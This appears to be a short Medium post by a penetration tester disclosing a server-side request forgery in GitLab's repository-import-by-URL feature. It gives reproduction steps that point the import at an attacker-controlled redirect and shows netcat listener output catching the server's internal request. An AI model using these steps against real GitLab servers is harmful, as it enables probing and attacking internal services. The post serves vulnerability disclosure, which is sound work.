[GITLAB] — Server Side Request Forgery in “Project Import” page.

  1. Create a new project.
  2. Import Project — Repo by URL.
  3. Fill in the URL field with my VPS url http://<IP>/redirect.php.
  4. Click Create Project.
root@debian:/home/test# nc -lvvp 1339 
listening on [any] 1339 ...
connect to [127.0.0.1] from localhost [127.0.0.1] 39282
GET / HTTP/1.1 Host: localhost:1339
User-Agent: git/2.14.3
Accept: */*
Accept-Encoding: gzip
Pragma: no-cach

--

--

--

Penetration Tester https://www.linkedin.com/in/ltsirkov/

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

{UPDATE} Chicken Quesadilla Cooking Hack Free Resources Generator

6 Internet of Things (IoT) security technologies on the contemporary market

The Recharge Weekly Update (Week 4, October)

Hacking and social engineering with a 70% success rate

How will the Cybersecurity Sector Rise in a Digitized World?

{UPDATE} Global Dash! Temple Maze Relic Hunter Hack Free Resources Generator

KIM CryptoMoon🚀 on Twitter: “🥳 Safe The Humanity Bounty Contest📣 🙌 #Giveaway $24,000 in $STH…

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Lyubomir Tsirkov

Lyubomir Tsirkov

Penetration Tester https://www.linkedin.com/in/ltsirkov/

More from Medium

Malicious file upload leads to off-domain XSS

Research on Clickjacking & Network Sniffing- Cyber Sapiens Internship Task-14

How to Exploit Public Firebase Realtime Database using REST API

Interesting Stored XSS